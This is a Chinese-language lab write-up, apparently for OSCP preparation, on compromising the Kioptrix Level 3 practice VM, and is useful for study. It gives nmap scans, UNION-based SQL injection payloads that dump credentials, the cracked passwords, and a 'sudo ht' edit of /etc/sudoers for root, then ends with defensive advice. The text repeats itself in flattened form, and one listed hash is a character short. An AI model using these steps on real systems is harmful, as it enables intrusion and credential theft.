kioptix level 3靶机getshell及提权(按oscp考证要求使用)
字数 1366 2025-08-22 12:23:06

Kioptrix Level 3 靶机渗透测试与提权指南

一、靶机环境搭建

  1. 下载Kioptrix Level 3靶机镜像
  2. 在虚拟化平台(如VMware/VirtualBox)中导入靶机
  3. 确保靶机与攻击机(Kali Linux)在同一网络段

二、信息收集阶段

1. 网络扫描

nmap -sn 192.168.108.0/24
  • 确定靶机IP地址(本例中为192.168.108.137)
  • 排除已知IP(如Kali Linux的192.168.108.130)

2. 端口与服务扫描

nmap -p 1-65535 192.168.108.137
nmap -sV 192.168.108.137

扫描结果:

  • OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
  • Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

3. 详细指纹识别

nmap 192.168.108.137 -p 22,80 -sV -sC -O --version-all

操作系统信息:

  • OS CPE: cpe:/o:linux:linux_kernel:2.6
  • OS details: Linux 2.6.9 - 2.6.33

三、Web应用渗透

1. 访问Web服务

  • 发现登录框,尝试弱口令无果
  • 发现某些页面无法正常访问,可能是DNS解析问题

2. 配置DNS解析

Linux环境:

sudo vim /etc/hosts

添加:

192.168.108.137 kioptrix3.com

Windows环境:

  1. 清除浏览器缓存
  2. 编辑C:\Windows\System32\drivers\etc\hosts文件
  3. 添加相同条目

3. 发现SQL注入漏洞

  • 发现URL中存在id参数
  • 测试注入点: 
    id=2
id=1'
    发现报错,确认存在SQL注入漏洞

4. 利用SQL注入获取数据库信息

爆列数:

?id=1 order by 7--

爆行数:

?id=2 union select 1,2,3,4,5,6--

爆数据库名:

?id=2 union select 1,database(),3,4,5,6--

结果:gallery

爆表名:

?id=2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.columns where table_schema=database()--

爆列名:

?id=2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() and table_name='dev_accounts'--

获取用户凭证:

?id=2 union select 1,group_concat(username),group_concat(password),4,5,6 from dev_accounts--

结果:

  • 用户名:dreg, loneferret
  • MD5哈希密码:0d3eccfb887aabd50f243b3f155c0f8, 5badcaf789d3d1d09794d8f021f40f0e
  • 破解后明文密码:Mast3r, starwars

四、系统访问

1. SSH登录

由于OpenSSH版本较旧,需要使用特定算法:

ssh -o HostKeyAlgorithms=+ssh-rsa loneferret@192.168.108.137

密码:starwars

2. 检查系统文件

发现重要文件:

  • checksec.sh
  • CompanyPolicy.README

五、权限提升

1. 使用sudo ht提权

  1. 执行:
sudo ht
  1. 如果遇到环境变量问题:
export TERM=xterm

  1. 在ht编辑器界面:

    • 按F3搜索
    • 输入/etc/sudoers
    • 添加loneferret ALL=(ALL) /bin/bash
    • 按F10保存退出

  2. 执行:

sudo /bin/bash

成功获取root权限

六、关键要点总结

  1. 信息收集:全面的nmap扫描是渗透测试的基础
  2. Web渗透
    • 注意URL参数可能存在的注入点
    • 系统性的SQL注入测试方法
  3. 凭证破解:MD5哈希可通过在线工具或字典破解
  4. SSH连接:旧版本可能需要特殊参数
  5. 权限提升
    • 检查sudo权限
    • 利用文本编辑器提权是常见方法
    • 注意环境变量设置

七、防御建议

  1. 及时更新系统和软件版本
  2. 对用户输入进行严格过滤,防止SQL注入
  3. 使用强密码策略,避免使用弱密码
  4. 限制sudo权限,避免普通用户通过编辑器获取root权限
  5. 定期检查系统配置文件和权限设置

八、注意事项

  1. 实际渗透测试中必须获得授权
  2. OSCP考试中不允许使用外部工具(如GPT)
  3. 所有技术仅用于合法授权的安全测试和学习目的
Kioptrix Level 3 靶机渗透测试与提权指南 一、靶机环境搭建 下载Kioptrix Level 3靶机镜像 在虚拟化平台(如VMware/VirtualBox)中导入靶机 确保靶机与攻击机(Kali Linux)在同一网络段 二、信息收集阶段 1. 网络扫描 确定靶机IP地址(本例中为192.168.108.137) 排除已知IP(如Kali Linux的192.168.108.130) 2. 端口与服务扫描 扫描结果: OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) 3. 详细指纹识别 操作系统信息: OS CPE: cpe:/o:linux:linux_ kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 三、Web应用渗透 1. 访问Web服务 发现登录框,尝试弱口令无果 发现某些页面无法正常访问,可能是DNS解析问题 2. 配置DNS解析 Linux环境: 添加: Windows环境: 清除浏览器缓存 编辑C:\Windows\System32\drivers\etc\hosts文件 添加相同条目 3. 发现SQL注入漏洞 发现URL中存在id参数 测试注入点: 发现报错,确认存在SQL注入漏洞 4. 利用SQL注入获取数据库信息 爆列数: 爆行数: 爆数据库名: 结果:gallery 爆表名: 爆列名: 获取用户凭证: 结果: 用户名:dreg, loneferret MD5哈希密码:0d3eccfb887aabd50f243b3f155c0f8, 5badcaf789d3d1d09794d8f021f40f0e 破解后明文密码:Mast3r, starwars 四、系统访问 1. SSH登录 由于OpenSSH版本较旧,需要使用特定算法: 密码:starwars 2. 检查系统文件 发现重要文件: checksec.sh CompanyPolicy.README 五、权限提升 1. 使用sudo ht提权 执行: 如果遇到环境变量问题: 在ht编辑器界面: 按F3搜索 输入/etc/sudoers 添加 loneferret ALL=(ALL) /bin/bash 按F10保存退出 执行: 成功获取root权限 六、关键要点总结 信息收集 :全面的nmap扫描是渗透测试的基础 Web渗透 : 注意URL参数可能存在的注入点 系统性的SQL注入测试方法 凭证破解 :MD5哈希可通过在线工具或字典破解 SSH连接 :旧版本可能需要特殊参数 权限提升 : 检查sudo权限 利用文本编辑器提权是常见方法 注意环境变量设置 七、防御建议 及时更新系统和软件版本 对用户输入进行严格过滤,防止SQL注入 使用强密码策略,避免使用弱密码 限制sudo权限,避免普通用户通过编辑器获取root权限 定期检查系统配置文件和权限设置 八、注意事项 实际渗透测试中必须获得授权 OSCP考试中不允许使用外部工具(如GPT) 所有技术仅用于合法授权的安全测试和学习目的